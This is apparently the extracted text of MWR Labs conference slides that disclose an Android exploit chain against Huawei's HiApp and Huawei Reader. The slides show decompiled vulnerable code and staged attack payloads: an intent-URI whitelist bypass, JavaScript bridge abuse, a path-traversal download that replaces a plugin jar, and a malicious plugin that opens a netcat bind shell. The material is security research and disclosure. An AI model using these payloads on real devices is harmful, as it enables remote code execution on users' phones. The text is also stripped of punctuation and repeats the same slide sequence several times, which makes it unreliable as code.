return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
